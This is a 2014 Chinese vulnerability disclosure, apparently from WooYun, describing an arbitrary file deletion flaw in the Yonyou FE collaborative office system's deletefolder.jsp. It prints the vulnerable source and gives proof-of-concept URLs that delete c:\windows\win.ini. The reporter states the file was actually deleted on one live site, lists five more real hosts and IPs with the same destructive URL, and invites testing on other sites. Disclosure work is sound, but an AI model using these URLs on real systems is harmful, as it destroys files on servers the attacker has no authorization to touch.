漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-09-05: 细节已通知厂商并且等待厂商处理中
2014-09-10: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-11-04: 细节向核心白帽子及相关领域专家公开
2014-11-14: 细节向普通白帽子公开
2014-11-24: 细节向实习白帽子公开
2014-12-01: 细节向公众公开
简要描述:
用友FE协同办公系统某处验证不严,导致任意文件删除漏洞
详细说明:
漏洞影响版本V5.5.2
漏洞文件:/sys/file_setup/deletefolder.jsp?path=
漏洞参数:path
/sys/file_setup/deletefolder.jsp源代码如下:
---------------------------------------------
<%
String path=request.getParameter("path");
if(path==null|| "".equals(path))
path=(String)request.getAttribute("path");
if(path==null||path.equals("")){
out.println("你没有权限访问或者设置根目录,请联系系统管理员");
return;
}
if(path==null)path="";
String delPath=path;
delPath=delPath.replace(java.io.File.separatorChar,'/');
File delFile=new File(delPath);
boolean is=false;
if(delFile.exists()){
is=delFile.delete();
}
if(is){
%>
<script language="javascript">
alert("删除成功!");
var reloadSrc=parent.westFrame;
reloadSrc.location.href=reloadSrc.location.href;
</script>
<%
}
else{
%>
<script language="javascript">
alert("文件被其他人员打开,稍候再删除!");
var reloadSrc=parent.westFrame;
</script>
<%
}
%>
---------------------------------------------------
path参数用户可控,并且没有进行文件路径验证,导致任意文件删除漏洞!
漏洞证明:
以http://oa.hzuf.com:9090 作为测试案例:
1)第一次访问:
http://oa.hzuf.com:9090/sys/file_setup/deletefolder.jsp?path=c:\windows\win.ini
可以看到系统提示:”删除成功”!
2)第二次访问:
http://oa.hzuf.com:9090/sys/file_setup/deletefolder.jsp?path=c:\windows\win.ini
根据源代码逻辑可以判断,系统文件c:\windows\win.ini已经被成功删除。
c:\windows\win.ini文件已经被删除了,审核测试的时候可以换成其他文件,或者换下其他网站进行测试
其他测试案例:
http://119.145.194.122:9090/sys/file_setup/deletefolder.jsp?path=c:\windows\win.ini
http://220.168.210.109:9090/sys/file_setup/deletefolder.jsp?path=c:\windows\win.ini
http://oa.chnjcdc.com:9090/sys/file_setup/deletefolder.jsp?path=c:\windows\win.ini
http://oa.shunhengli.com:9090/sys/file_setup/deletefolder.jsp?path=c:\windows\win.ini
http://oa.linya.cn:9099/sys/file_setup/deletefolder.jsp?path=c:\windows\win.ini
修复方案:
权限控制
版权声明:转载请注明来源 路人甲@乌云
>
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-12-01 16:56
厂商回复:
最新状态:
暂无


